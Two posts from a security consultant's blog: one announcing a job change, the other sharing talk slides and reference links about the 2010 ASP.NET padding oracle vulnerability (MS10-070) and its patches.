Wednesday, March 09, 2011
Last month I started in a new role at Aura Software Security, where I am a security consultant. I'm excited about all the fun stuff I'll be doing, getting involved with security advice, training and testing at all stages of the development lifecycle.

However, starting a new job means leaving another, and I'm sad to leave Xero. It has been a blast working at Xero, and I have made some great friends, had a lot of laughs, and been a part of building something pretty special.

In terms of this blog, I predict that nothing much will change -- I will continue to post infrequently, usually triggered by a promise to post some event slides or other online. If you're subscribed, you've probably noticed that most of my posts tend to be around web security, and I doubt that will change!

Kirk

posted on Wednesday, March 09, 2011 8:09:04 PM (New Zealand Standard Time, UTC+12:00)  #    Comments [1]
 Wednesday, September 29, 2010

Thanks to those user group members and Xero partners that came along to our talk today.

We covered the two vulnerabilities released last week, the workarounds, and the patches that were released this morning.

Here are the slides: KirkJackson-PaddingOracle.pdf (641.14 KB)

All ASP.NET applications are affected. The best thing to do is install the patches released this morning.


Problem & bulletins:

Security bulletin MS10-070

Useful info on ScottGu's blog

Forum about the security vulnerability

Video of a site exploit, even with the workarounds applied

Patch:

Scott Gu's writeup of the patch

Post-mortem of the patch - Marc Brooks

How to configure the new patched features

Research:

Juliano Rizzo and Thai Duong and their POET tool

Padbuster tool (including a great writeup of Padding Oracles)

posted on Wednesday, September 29, 2010 8:25:39 PM (New Zealand Standard Time, UTC+12:00)  #    Comments [0]